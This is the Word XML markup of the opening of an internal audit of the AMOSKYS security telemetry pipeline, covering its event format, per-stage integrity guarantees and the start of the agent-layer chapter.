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EFA0D" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:before="800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1B933F" w14:textId="65CE1152" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>AMOSKYS OPERATIONAL DEEP AUDIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECBF84" w14:textId="2D7B6B74" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Telemetry Lifecycle: Axon → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → WAL → Enrichment → Correlation → Cortex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7BE671" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:before="400"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4485CB" w14:textId="72D613DC" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Beta v0.9.0-beta.1 | February 24, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDA99D" w14:textId="19C4CD25" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="800"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="E74C3C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CONFIDENTIAL — Internal Architecture Review</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F0E950" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3396E0" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092FF009" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 1: Audit Charter (Phase 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1848E3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 2: Agent Layer (Phase 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0E81C" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 3: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Phase 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC54420" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 4: WAL Layer (Phase 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD3642E" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 5: Enrichment (Phase 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B70969" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 6: Correlation Engine (Phase 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0CCAC" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 7: Cortex / Web Layer (Phase 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE8BFEB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 8: Golden Attack Scenario (Phase 7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817879F" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 9: Hardening Metrics (Phase 8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BA8BCC" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Chapter 10: Complete Gap Matrix (Phase 9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491CAF4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="280" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7823D52B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B5CD5B" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 1: Audit Charter (Phase 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0693E3C5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.1 What is an "Event" in AMOSKYS?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7295A985" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-serialized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UniversalEnvelope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> containing timestamped telemetry from a micro-probe within an agent. The envelope is integrity-protected by BLAKE2b hash chain on WAL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>write, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> optionally signed with Ed25519. It carries one of 9 event types: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FlowEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SecurityEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AuditEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PersistenceEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>FIMEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNSEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PeripheralEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729552EB" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.2 Minimum Atomic Telemetry Unit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659AE819" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A single </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TelemetryEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dataclass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> containing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>event_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (str), severity (Severity </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>enum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>probe_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (str), data (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">[str, Any]), timestamp (datetime), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>timestamp_ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Optional[int]), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mitre_techniques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (List[str]), confidence (float 0.0-1.0), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>device_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (str), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>correlation_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (Optional[str]), tags (List[str]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C6E220" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.3 Integrity Guarantees per Stage</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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0"/>
        <w:gridCol w:w="2782"/>
        <w:gridCol w:w="2094"/>
        <w:gridCol w:w="2714"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="0DE4AA6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1B2A4A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D8D57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Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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4006D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Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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11A74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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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0D193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Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="7ED77F1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AF004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Agent → Local Queue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689D1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 xml:space="preserve">Ed25519 signature on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content_hash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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1F1E4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27AE60"/>
              </w:rPr>
              <w:t>IMPLEMENTED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97EEF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wal_sqlite.py:131-157</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="577CDB9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4C279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 xml:space="preserve">Local Queue →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EventBus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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55952" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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gRPC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mTLS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(TLS 1.2+)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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095EC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27AE60"/>
              </w:rPr>
              <w:t>ENFORCED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47799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server.py:1591</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="2AA18B5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1BDE5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus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Publish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EEC4F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Ed25519 envelope sig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FEF5E7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C5EC1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F39C12"/>
              </w:rPr>
              <w:t>OPTIONAL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BD39B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server.py:512</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="057F60E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B84FD" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="280" w:lineRule="auto"/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EventBus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→ WAL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9A578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BLAKE2b checksum + chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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DB1FA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27AE60"/>
              </w:rPr>
              <w:t>ENFORCED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1A54E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wal_sqlite.py:145</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="77A8C5C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44C6B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WAL → Storage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44C95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Chain verification + quarantine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="E8F8F0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AD450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27AE60"/>
              </w:rPr>
              <w:t>ENFORCED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FC5ED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wal_processor.py:119</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="4B583DC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925DD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Storage → Cortex API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E4169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No integrity verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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046D7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E74C3C"/>
              </w:rPr>
              <w:t>GAP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A7CF2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API returns raw JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00501EAB" w14:paraId="417A20B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62042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Cortex → User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04338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No hash display, no chain proof</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="FDEDEC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F7A83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E74C3C"/>
              </w:rPr>
              <w:t>GAP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BABC9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UI has no integrity UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05455556" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE783B5" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.4 Out of Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB48AD2" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Windows-specific attacks, cloud infrastructure (AWS/GCP/Azure), container orchestration, network tap/packet capture, mobile device telemetry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E92D9" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="179472B7" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="400" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Chapter 2: Agent Layer (Phase 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35018ED4" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.1 Architecture: The Micro-Probe Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D12546" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OS API/File/Log → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MicroProbe.scan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TelemetryEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dict</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8FA221" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Agent.collect_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BB291" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LocalQueueAdapter.enqueue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() → SQLite (signed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650E31B3" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="F5F5F5" w:fill="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus.PublishTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() → WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9595BD" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00501EAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419E5B36" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each agent hosts multiple lightweight probes. Each probe monitors ONE specific threat vector. The base agent loop runs on a configurable interval, aggregating all probe output into a single </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DeviceTelemetry</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>protobuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, then queuing for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EventBus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E0181" w14:textId="77777777" w:rsidR="00501EAB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.2 Agent Capability Matrix</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders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  <w:insideH w:val="single" w:sz="6" w:space="1" w:color="CCCCCC"/>
          <w:insideV w:val="single" w:sz="6" w:space="1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0"/>
        <w:gridCol w:w="1374"/>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="2232"/>
        <w:gridCol w:w="1612"/>
      </w:tblGrid>
      <w:tr w:rsidR="00501EAB" w14:paraId="7E0BA5D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1B2A4A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C985D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Agent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="1B2A4A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E1436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Probes</w:t>
